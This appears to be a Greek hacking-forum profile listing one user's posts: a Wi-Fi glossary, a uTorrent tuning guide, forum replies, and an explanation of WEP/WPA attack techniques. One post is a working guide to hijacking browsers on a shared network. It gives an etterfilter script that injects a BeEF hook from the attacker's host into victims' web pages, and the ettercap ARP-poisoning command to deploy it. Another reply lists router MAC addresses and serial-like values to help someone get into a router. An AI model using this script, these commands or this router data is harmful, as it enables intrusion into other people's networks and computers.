-
Posts
519 -
Joined
-
Last visited
-
Feedback
0%
Content Type
Articles
Profiles
Forums
Store
Everything posted by ~Grey Hat~
-
Katarxas legete section kai oxi selection..Kata deuteron egw proteinw ontws ena diaforetiko tropo me reaver..dn mphka kan ston kopo na dw to video kai ontws einai allos tropos gnwstos kai autos..kai gia na kleinei to thema auto p thelw na s perase einai oti dn exei nohma na kaneis post ena video ..an thelei kapoios video paei sto youtube kai pataei auto p thelei ..ara vgale to guide apo to tittle kai vale [share] h kati tetoio..kai credis se auton p to exei kanei
-
Arxika na poume oti eisai se lathos section..deuteron den einai kai oti kalutero na anevazeis video pou den einai dika sou kai eidika xwris plhrofories ..!Epishs exw kanei analutiko odhgo gia auth tn epithesi sto swsto section kai akoma ,exw analusei pws mporei kaneis na treksei backtrack..dn nomizw oti voithaei kanenan to post sou..as to koitaksei kapoios
-
poio einai to tetrapsifio tha mas peis ?
-
[GR]Πως να επιταχυνεις το μΤορρεντ!
~Grey Hat~ replied to ~Grey Hat~'s topic in Hacking Tutorials & Guides
Το παιδι απαντησε με τροπο ειρωνικο και ισως αυτος που ρωτησε δεν καταλαβε ! :) ευχαριστω που ενδιαφερεσαι παντως! -
[GR]Πως να επιταχυνεις το μΤορρεντ!
~Grey Hat~ replied to ~Grey Hat~'s topic in Hacking Tutorials & Guides
Γιατι ,για να ρωτησε το παιδι σε δικο μου τοπικ υποτιθεται εγω πρεπει να απαντησω..Εσυ εισαι εξυπνος και κραζεις απο κατω ? -
Λοιπον γεια σας! Αποφασισα να φτιαξω ενα τοπικ με λεξεις που συχνα συνανταμε και ισως να μη γνωριζουμε τι σημαινουν!Αυτο το τοπικ θα μας βοηθησει να κατανοησουμε σε βαθος αυτες τι εννοιες!Ας αρχισουμε! • AP – (Access Point), μια συσκευή ενός Wi-Fi δικτύου η οποία συνδέει πελάτες του δικτύου αυτού μεταξύ τους και με ενσύρματα δίκτυα • Ad Hoc (Mode) – Η λειτουργία κατά την οποία ένας υπολογιστής μπορεί να συνδεθεί με έναν άλλο απευθείας σχηματίζοντας δίκτυο, χωρίς την παρεμβολή ενός AP • ARP – (Address Resolution Protocol), πρωτόκολλο μετάφρασης διευθύνσεων IP σε διευθύνσεις MAC. • Association – Η διαδικασία κατά την οποία ένας πελάτης συνάπτει επαφή με έναν άλλο ή με ένα δίκτυο (προηγείται authentication) [περιεχόμενα] • Authentication – Η διαδικασίας πιστοποίησης της ταυτότητας ενός πελάτη (supplicant), ώστε να επιβεβαιωθεί πως οι πληροφορίες πάνε εκεί που πρέπει ή έρχονται από εκεί που πρέπει. • Authenticator – Η συσκευή η οποία δρομολογεί τη σύνδεση ενός πελάτη με έναν άλλο ή με ένα δίκτυο (συνήθως είναι ένα AP). • Beacon – Το σήμα που στέλνει ένα AP για να ανακοινώσει την ύπαρξή του και μπορεί να περιλαμβάνει διάφορα στοιχεία πχ ESSID, MAC address κλπ • BSSID – (Basic Service Set Identifier), διεύθυνση MAC του access point. • CCMP – (Counter-Mode / Cipher Block Chaining Message Authentication Code Protocol), πρωτόκολλο κρυπτογράφησης που χρησιμοποιείται στο WPA2, βασισμένο στον AES block cipher. • Channel – Είναι ένα συγκεκριμένο εύρος συχνότητας, μήκους 1Μhz και διαφοροποιείται κατά 5Mhz από τα άλλα κανάλια στα οποία έχει πρόσβαση μια Wi-Fi συσκευή κάθε στιγμή. • CRC – (Cyclic Redundancy Check), pseudo-integrity αλγόριθμος που χρησιμοποιείται για την πιστοποίηση της ακεραιότητας δεδομένων. • Dictionary – ένα σύνολο λέξεων (λεξικό δλδ xP) που θα χρησιμοποιηθεί σε μια bruteforce attack • Dynamic WEP – η προσπάθεια να ισχυροποιηθεί το WEP με χρήση δύο κλειδιών: ένα broadcast key για την κρυπτογράφηση της πληροφορίας (το shared key δλδ) και ένα session key μοναδικό για κάθε authenticated supplicant. Οι τιμές των δύο κλειδιών ανανεώνονται ανά κάποια λεπτά. • EAP – (Extensible Authentication Protocol), βασικό πρωτόκολλο στο οποίο πατάνε διάφορες μέθοδοι authentication. • EAPOL – (EAP Over LAN), εφαρμογή του πρωτοκόλλου EAP στα δίκτυα. • ESSID – (Extended Service Set Identifier), το όνομα του δικτύου • Fragmentation – η διαδικασία κατά την οποία ένα πακέτο πληροφορίας σπάει σε μικρότερα πακέτα για να αποσταλλεί και τα οποία θα χρειαστεί να “επανακολληθούν” στον προορισμό τους. • Frame – μπορούμε να θεωρήσουμε πως frame είναι το ίδιο με ένα packet. O “ορισμός” για όποιον ενδιαφέρεται είναι πως όταν υπάρχει ανταλλαγή μυνημάτων στο layer 2 του OSI model μιλάμε για frames, ενώ όταν η ανταλλαγή γίνεται στο 3 layer για packets (το OSI model είναι ένα μοντέλο αρχιτεκτονικής δικτύου) • GEK – (Group Encryption Key), κλειδί για κρυπτογράφηση δεδομένων σε multicast traffic (επίσης χρησιμοποιείται για επαλήθευση ακεραιότητας -integrity- στο CCMP). • GIK – (Group Integrity Key), κλειδί για κρυπτογράφηση δεδομένων σε multicast traffic (TKIP). • GMK – (Group Master Key), κύριο κλειδί της group key hierarchy. • GTK – (Group Transient Key), κλειδί που παράγεται από το GMK. • Handshake – διαδικασία μιας σειράς ερωτήσεων-απαντήσεων με σκοπό την πιστοποίηση του supplicant • ICV – (Integrity Check Value), data field που προσαρτάται στην plaintext για έλεγχο της ακεραιότητάς της (βασισμένο στον αδύναμο CRC32 αλγόριθμο). • Infrastructure (Mode) – Ο τρόπος λειτουργίας κατά τον οποίο ένας υπολογιστής συνδέεται πρώτα με ένα AP και μετά με το δίκτυο. • IP address – (Internet Protocol address) είναι ένας μοναδικός αριθμός που δείχνει που βρίσκεται ο υπολογιστής σου σε σχέση με τους άλλους υπολογιστές και το αντίστροφο. • IV – (Initialization Vector), δεδομένα που συνδυάζονται με το encryption key ώστε να παραχθεί μια μοναδική keystream. • KCK – (Key Confirmation Key), κλειδί ελέγχου ακεραιότητας που προστατεύει τα μηνύματα handshake. • KEK – (Key Encryption Key), “εμπιστευτικό” κλειδί που προστατεύει τα handshake μηνύματα. • MAC address – (Media Access Control address), ένας 48-bit αριθμός που δίνεται σε κάθε κάρτα δικτύου από τον κατασκευαστή της. • MIC – (Message Integrity Code), data field που προσαρτάται στην plaintext για έλεγχο της ακεραιότητάς της (παράγεται από τον αλγόριθμο Michael). • MK – (Master Key), το κύριο κλειδί που γνωρίζει ο supplicant και ο authenticator μετά τη διαδικασία authentication του 802.1x. • Monitor Mode – Η κατάσταση λειτουργίας μιας wifi συσκευής κατά την οποία λαμβάνει τα πακέτα που κυκλοφορούν στο wifi δίκτυο. Είναι γνωστή και ως raw mode. • MPDU – (Mac Protocol Data Unit), πακέτο δεδομένων πριν το fragmentation. • MSDU – (Mac Service Data Unit), πακέτο δεδομένων μετά το fragmentation. • PAE – (Port Access Entity), λογική πόρτα του 802.1x. • packet (πακέτο) – Η ελάχιστη μονάδα συμπύκνωσης (πακεταρίσματος) των δεδομένων κατά τη διάρκεια οποιασδήποτε μεταφοράς και επικοινωνίας μεταξύ δύο υπολογιστών. Σε κάθε είδος δικτύου, υπάρχει συνεχής ροή "πακέτων" από και προς κάθε σταθμό του δικτύου. [περιεχόμενα] • PMK – (Pairwise Master Key), κύριο κλειδί στην ιεραρχία pairwise key. • PRGA – (Pseudo Random Generation Algorithm) η διαδικασία παραγωγής της keystream στον RC4. Ισχύει το παρακάτω πολύ χρήσιμο ciphertext ⊕ plaintext = PRGA • PSK – (Pre-Shared Key), κλειδί που παράγεται από έναν κωδικό (passphrase) αντικαθιστώντας το PMK σε WPA-PSK mode. • PTK – (Pairwise Transient Key), κλειδί που παράγεται από το PMK. • Rainbow tables – έτοιμα hashes λέξεων για χρήση σε bruteforce/dictionary attacks • RSN – (Robust Security Network), μηχανισμός ασφαλείας στο 802.11i (TKIP, CCMP etc.). • RSNA – (Robust Security Network Association), επαφή ασφαλείας που χρησιμοποιείται σε έναν RSN, δλδ όταν χρησιμοποιείται η 4-way handshake. • RSN IE – (Robust Security Network Information Element), πεδία που περιέχουν RSN πληροφορίες και περιέχονται σε ένα Probe Response και Association Request. • Sniffing – Η διαδικασία συλλογής των πακέτων που κυκλοφορούν σε ένα δίκτυο • Spoofing – Η τεχνική με την οποία ο attacker προσποιείται μια διαφορετική ιδιότητα από την πραγματική. Πχ mac spoofing είναι όταν αλλάζει την mac address του για να γίνει νόμιμος client, arp spoofing όταν τροποποιεί την πηγή ή τον προορισμό των πακέτων μιας ροής δεδομένων και πάει λέγοντας • SSID – (Service Set Identifier), wireless network identifier (όχι το ίδιο με το ES-SID). • STA – (Station), ένας πελάτης δικτύου. • TK – (Temporary Key), κλειδί για κρυπτογράφηση δεδομένων σε unicast traffic (χρησιμοποιείται και για έλεγχο ακεραιότητας -integrity checking- στο CCMP). • TKIP – (Temporal Key Integrity Protocol), πρωτόκολλο κρυπτογράφησης που χρησιμοποιείται στο WPA και βασίζεται στον RC4 αλγόριθμο (ο οποίος χρησιμοποιείται και στο WEP). • TMK – (Temporary MIC Key), κλειδί για data integrity σε unicast traffic (TKIP). • TSC – (TKIP Sequence Counter), replay counter που χρησιμοποιείται στο TKIP. • TSN – (Transitional Security Network), προ-802.11i μηχανισμός ασφαλείας(WEP κλπ.). • WEP – (Wired Equivalent Privacy), default πρωτόκολλο κρυπτογράφησης που χρησιμοποιείται στα 802.11 δίκτυα. • Wi-Fi – (Wireless Fidelity), η γνωστή σε όλους μας τεχνολογία ασύρματης δικτύωσης • WPA – (Wireless Protected Access), εφαρμογή μιας πρώιμης έκδοσης του 802.11i στάνταρ, βασισμένη στο TKIP. • WRAP – (Wireless Robust Authenticated Protocol), παλιό πρωτόκολλο κρυπτογράφησης που χρησιμοποιείται στο WPA2. Ευχαριστω!
-
Xaxa auto sigoura thelei reputation tote :P
-
Αυτα ειναι γενικες πληροφοριες.Δεν εχει σημασια αν το εκανα η οχι μονος μου πιστευω..Επισης κατι τετοιο δεν αξιζει reputation!Δεν ειναι κατι τρομερο παρα μονο πληροφοριες!
-
Dokimase auta mia ..An dn pianoun pes m.. CYTA F006, 00:25:53:8A:F0:06, YW0276458, CYTA 1BD2, 38:22:9D:A3:1B:D2, 25801Y0019014, CYTA CE0A, 38:22:9D:98:CE:0A, 25801Y0014558, CYTA 130C, 38:22:9D:AB:13:0C, 25801Y0068608
-
Pes mou ton tetrapsifio tou router ..ton ksereis etsi ? gia na dw ti mporw na s vrw
-
o kwdikos ennoeis einai tetrapsifios ?
-
[GR]Πως να επιταχυνεις το μΤορρεντ!
~Grey Hat~ replied to ~Grey Hat~'s topic in Hacking Tutorials & Guides
Oπως ειπε και ο φιλος απο πανω για να κατεβαζεις πιο γρηγορα τα αρχεια που θελεις! -
Παρακατω σας αναλυω ειδη επιθεσεων που υπαρχουν! Deauthentication Ο τρόπος που λειτουργεί είναι να αποστέλλει πακέτα deuthentication στους clients ώστε αυτοί να εξαναγκαστούν να κάνουν εκ νέου πιστοποίηση (reauthenticate). Με παρόμοιο τρόπο είναι δυνατή η μαζική αποσύνδεση πολλών clients ή ακόμη και μια επίθεση DoS ενάντια σε έναν ή όλους (Queensland DoS). Αυτή η επίθεση είναι χρήσιμη για τους εξής λόγους: -Αποκάλυψη κρυμμένου (hidden ή cloacked) AP, δηλαδή AP που δεν κάνει broadcast το ESSID του. -Καταγραφή WPA/WPA2 handshakes με εξαναγκασμό των clients για reauthentication -Πρόκληση αποστολής αιτήσεων ARP -MAC address spoofing Fake authentication Η ψεύτικη πιστοποίηση είναι χρήσιμη όταν δεν υπάρχουν συνδεδεμένοι clients και χρειαζόμαστε μια associated MAC adress. Επιτρέπει και τους δύο τρόπους που χρησιμοποιεί το WEP και μπορεί να κάνει association με ένα AP. Δεν δημιουργεί πακέτα ARP και δεν μπορεί να συνδεθεί με AP που λειτουργούν με WPA/WPA2. Interactive packet replay/package injection O σκοπός της επίθεσης αυτής είναι να αναγκάσουμε το AP να στείλει πακέτα κρυπτογραφημένα με νέο IV κάθε φορά. Για να το πετύχουμε αυτό, μπορούμε να καταγράψουμε ένα πακέτο και να το ξαναστείλουμε (inject) ώστε το ΑP να απαντήσει, γεννώντας ένα νέο IV που θα σταλεί με το πακέτο πίσω. Αυτό δεν γίνεται με όλα τα πακέτα, πρέπει είτε να έχουμε ένα πακέτο το οποίο ξέρουμε πως θα το δεχτεί το AP, είτε να κατασκευάσουμε ένα μόνοι μας. Τα χαρακτηριστικά που πρέπει να έχει ένα τέτοιο πακέτο ώστε να είναι φυσικό (natural), είναι 1) να προορίζεται για την broadcast MAC address (FF:FF:FF:FF:FF) -πχ τα ARP πακέτα- 2) να προέρχεται από έναν wireless client και να πηγαίνει στο δίκτυο, δλδ να έχει το DS (distribution system) bit του τιμή 1 Όταν το πακέτο που έχουμε δεν έχει τα παραπάνω χαρακτηριστικά, μπορούμε πάντοτε να του τα δώσουμε (package forgery). ARP request replay/ARP Injection Είναι ο κλασσικός τρόπος ώστε να πάρουμε τα IVs που χρειαζόμαστε από το AP. Είναι σταθερός, αλλά αργός σε σύγκριση με την package injection και δουλεύει σχεδόν πάντα. Αρκεί να “ακούμε” για κάποιο πακέτο ARP και μόλις το καταγράψουμε να το ξαναστείλουμε πίσω. Ως απάντηση το AP θα επαναλάβει το πακέτο, κρυπτογραφημένο με ένα νέο IV. To ίδιο πακέτο συνεχίζει να στέλνει ο attacker ξανά και ξανά και το AP θα συνεχίσει χαρωπά να τα επιστρέφει, με ένα νέο IV για κάθε φορά. Όταν συλλέξουμε αρκετά πακέτα, μπορούμε να σπάσουμε το WEP key. KoreK chopchop Αυτή η επίθεση όταν είναι επιτυχής, μπορεί να αποκρυπτογραφήσει ένα WEP πακέτο χωρίς να γνωρίζουμε το key, δηλαδή δεν αποκαλύπτει το ίδιο το WEP key, αλλά την plaintext και πιθανώς την PRGA τιμή που χρησιμοποιήθηκε για την κρυπτογράφησή του. Η διαδικασία είναι η εξής: 1) καταγράφουμε το πακέτο 2) κόβουμε το τελευταίο byte (chop off) 3) υποθέτοντας πως έχει την τιμή 0, ξαναφτιάχνουμε το πακέτο 4) το στέλνουμε στο AP το οποίο αν μαντέψαμε σωστά απαντά 5) αν όχι το πακέτο απορρίπτεται οπότε υποθέτουμε πως η τιμή του byte που κόψαμε είναι 1 και επαναλαμβάνουμε τη διαδικασία για όλες τις 256 πιθανές τιμές του, μέχρι να απαντήσει το AP οπότε θα ξέρουμε πως βρήκαμε τη σωστή τιμή 6) συνεχίζουμε με το επόμενο byte και η διαδικασία επαναλαμβάνεται έως ότου αποκρυπτογραφήσουμε όλο το πακέτο Όπως είναι προφανές ο ΚoreK εκμεταλλεύτηκε την bit-flipping αδυναμία του CRC32 που χρησιμοποιείται στην ICV και ανακάλυψε τη μαθηματική σχέση μεταξύ του choped off πακέτου και της τιμής που χρειάζεται η ICV για να γίνει το πακέτο αυτό έγκυρο. Fragmentation attack Αυτή η επίθεση μπορεί να αποκαλύψει 1500 bytes της PRGA, η οποία μπορεί να χρησιμοποιηθεί για την κατασκευή κατάλληλων πακέτων που χρησιμοποιούνται σε injection attacks. Με κάθε πακέτο που λαμβάνεται, λαμβάνεται ταυτόχρονα και κομμάτι της PRGA το οποίο έχει χρησιμοποιηθεί για την κρυπτογράφησή του, έτσι με τη συλλογή αρκετών πακέτων μπορούμε να βρούμε την RPGA που χρησιμοποιήθηκε. Η fragmentation attack απαιτεί ένα πακέτο από το δίκτυο (το οποίο να μην έχει ως παραλήπτη το AP, γιατί δε θα το κάνει relay) ώστε να ξεκινήσει και είναι πολύ γρήγορη. Caffe-latte attack Η επίθεση αυτή καταρρίπτει τον μύθο πως χρειάζεται ο attacker να είναι στην ακτίνα δράσης ενός ΑP ώστε να μπορεί να έχει πρόσβαση σε αυτό. Με την caffe-latte τεχνική, το υποψήφιο “θύμα” μπορεί να είναι ένα laptop πχ το οποίο δεν βρίσκεται συνδεδεμένο σε κανένα δίκτυο, του οποίου τα cached WEP keys περιμένουν υπομονετικά τον attacker να τα σπάσει! Παλιότερες επιθέσεις με τις οποίες μπορεί να γίνει SSID spoofing όπως οι evil twin/honeypot attacks ήδη έδειξαν τον δρόμο με τον οποίο μπορεί κάποιος να στήσει ένα εικονικό AP για να προσελκύσει ανυποψίαστους clients οι οποίοι ψάχνουν για wi-fi hotspots για να συνδεθούν. Για παράδειγμα μπορεί ο attacker να στήσει ένα ψεύτικο AP με ESSID “connex” ή κάποιο άλλο κοινώς χρησιμοποιούμενο όνομα και αφού προσελκύσει ένα laptop να σπάσει το WEP key ή να κάνει τον εαυτό του man-in-the-middle και να παρακολουθεί την ιντερνετική δραστηριότητα του “θύματος”. Για να σπάσει ο attacker το WEP key χρειάζεται αρκετά κρυπτογραφημένα πακέτα. Εφόσον δεν υπάρχει σύνδεση στο ίντερνετ, πως θα βρει τόσα; Το κλειδί εδώ είναι η εκμετάλλευση του τρόπου με τον οποίο το ARP διασφαλίζει πως δύο pc δε μοιράζονται την ίδια ip address. Όταν ένας νέος client εισέρχεται στο δίκτυο, το πρώτο πράγμα που κάνει είναι να ανακοινώσει την ip address του και να διασφαλίσει πως δεν χρησιμοποιείται ήδη. Κανονικά τα μηνύματα αυτά αγνοούνται από το “θύμα” εκτός και εάν χρησιμοποιεί την ip αυτή ήδη. Έτσι ο attacker στέλνει στο θύμα κατάλληλα ARP requests μέχρι να λάβει απάντηση. Τα κατάλληλα ARP πακέτα μπορούν να κατασκευαστούν με bit-flipping λόγω της αδυναμίας στο integrity checking του WEP, πχ είναι εύκολο αλλάζοντας την ΙP και την MAC address που περιέχονται στον header ενός gratuitous ARP πακέτου, ώστε να μετατραπεί σε έγκυρο κρυπτογραφημένο ARP request με αυτόν τον τρόπο. Όταν o attacker λάβει απάντηση, τότε το μόνο που χρειάζεται είναι να συνεχίσει να στέλνει το ίδιο ARP request, ζητώντας την ίδια ip -που τώρα ξέρει πως δεν μπορεί να έχει- οπότε το “θύμα” θα απαντά πως τη χρησιμοποιεί. Στο μεταξύ ο attacker θα συνεχίσει να μαζεύει πακέτα έως ότου σπάσει το WEP key.
-
Εισαγωγη Γεια σας και παλι!Αποφασισα να κανω εναν οδηγο με το πως μπορειτε να εισβαλεται σε εναν υπολογιστη μεσω του browser του!Προσοχη:Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο Tι θα χρειαστουμε? Μα φυσικα Βacktrack 5 και το Cross-Site-Sctript (xss) Ξεκινωντας Παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα #GreyHat if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</head>")) { replace("</head>", "</head><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> "); msg("EPIASES_LAYRAKIn"); } if (search(DATA.data, "</HEAD>")) { replace("</HEAD>", "</HEAD><script src="http://192.168.1.66/beef/hook/beefmagic.js.php"></script> "); msg("epiases_layrakin"); } } Eκει που γραφει http://192.168.1.66 θα πρεπει να βαλετε την δικη σας ip. Ξεκινωντας Την Διαδικασια Μετα αφου καναμε τα παραπανω ,παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef και παταμε να ανοιξει. Μετα παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ και παταω open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ) Αλλαξτε το http://127.0.0.1/beef με την δικια σας ip πχ http://192.168.1.66/beef ,πατα apply config και finished. Τωρα για να δειτε τι κανει το beEF ακριβως μπορειτε να το δοκιμασετε σε εσας αν πατε στο view spawn zombie example και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .Πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα Και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss Υπαρχουνε παρα πολλες επιλογες οπως: Nα εισβαλετε στον υπολογιστη του,Nα τον ανακατευθυνετε σε αλλη σελιδα κτλπ. Τωρα πως κανουμε το θυμα να ενωθει μαζι μας;Ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο(terminal) και γραφουμε etterfilter /root/Desktop/xssbeef -ο xssbeef.ef Μετα μας εμφανιζει αυτο etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file '/root/Desktop/xssbeef' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'filter.ef' done. -> Script encoded into 20 instructions. Μετα γραφουμε στο τερματικο, ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift u επιλεγουμε wlan0 μετα ctrl s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα Τελος,παταμε ctrl w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες)Αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας ettercap -T -M arp // // -F '/root/xssbeef.ef' -i wlan0 Θελει αρκετη δουλεια μεχρι να μαθετε να χειριζεστε καλα ολο αυτο το συστημα..Συμβουλη -- Μην το βαζετε κατω και προσπαθηστε , θα δειτε οτι στο τελος ειναι απλο! Ελπιζω να βοηθησα ευχαριστω
-
[GR]Πως να επιταχυνεις το μΤορρεντ!
~Grey Hat~ replied to ~Grey Hat~'s topic in Hacking Tutorials & Guides
Θεωρησα οτι αυτο θα διευκολυνει τους χρηστες του φορουμ γιατι ειμαι σιγουρος οτι πολλοι απο αυτους το χρησημοποιουν..Πολλα hacking τοολς , μαζι και αυτα που ανεβασα , ειναι μεγαλης εκτασης (2gb +) οποτε αν επιλεξει καποιος να τα κατεβασει με μΤοrrent να ειναι ανετος!Αν οντως κατι τετοιο δεν ανηκει στο section μπορει καλλιστα καποιος moderator να το μετακινησει..!Eυχαριστω! -
Εισαγωγη Καλημερα σας! Σημερα θα σας δειξω πως να πιασετε την μεγαλυτερη δυνατη ταχυτητα στο BitTorrent ωστε να κατεβαζετε με ανεση !θα χρειαστουμε να εχουμε συνδεση στο internet και το προγραμμα εγκατεστημενο! Ξεκινωντας Ανοιγουμε το μTorrent και παταμε ctrl+p και μας ανοιγει τις επιλογες και πηγαινουμε στην συνδεση και εφαρμοζουμε τις ρυθμισεις οπως στην εικονα Mετα παμε Ευρος ζωνης και εφαρμοζουμε τις ρυθμισεις οπως στην κατω εικονα Μετα παμε στο BitTorrent οπως στην εικονα και κανουμε οτι επιλογες εχει Μετα παμε στην Προτεραιοτητα και βαζουμε τα νουμερα που εχει και η εικονα Τελος ,παμε στις ρυθμισεις που λεει Προχωρημενες και βρισκουμε εκει που λεει net.max_halfopen και βαζουμε τιμη 90!Οπως παρακατω Ειμαστε πλεον ετοιμοι να κατεβαζουμε με την μεγιστη ταχυτητα που μπορουμε Συμβουλη *οταν κατεβαζετε να κοιτατε τους seeders να ειναι περισσοτεροι απο τους leechers δλδ με απλα λογια να κοιτατε αυτους που το ανεβαζουνε να ειναι περισσοτεροι απο αυτους που το κατεβαζουνε
